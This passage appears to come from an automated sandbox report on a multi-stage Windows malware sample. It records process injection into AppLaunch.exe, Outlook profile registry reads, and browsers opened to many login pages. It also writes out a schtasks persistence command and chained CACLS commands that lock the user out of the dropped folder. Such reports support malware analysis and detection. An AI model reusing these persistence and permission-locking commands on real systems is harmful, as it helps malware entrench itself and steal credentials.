PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4240 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe
PID 4240 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe
PID 4240 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe
PID 3824 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe
PID 3824 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe
PID 3824 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2236 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe
PID 2236 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe
PID 2236 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe
PID 3756 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3756 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3756 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4036 wrote to memory of 3948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe
PID 4036 wrote to memory of 3948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe

"C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3820 -ip 3820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\88C7.tmp\88C8.tmp\88C9.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x104,0x16c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6071968293449853800,12518414765028567510,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,15955059388898365744,13462130781041250341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15955059388898365744,13462130781041250341,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6071968293449853800,12518414765028567510,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11617768223588040314,4095512355431435123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,8621885126254123602,6905618308546528021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,8621885126254123602,6905618308546528021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

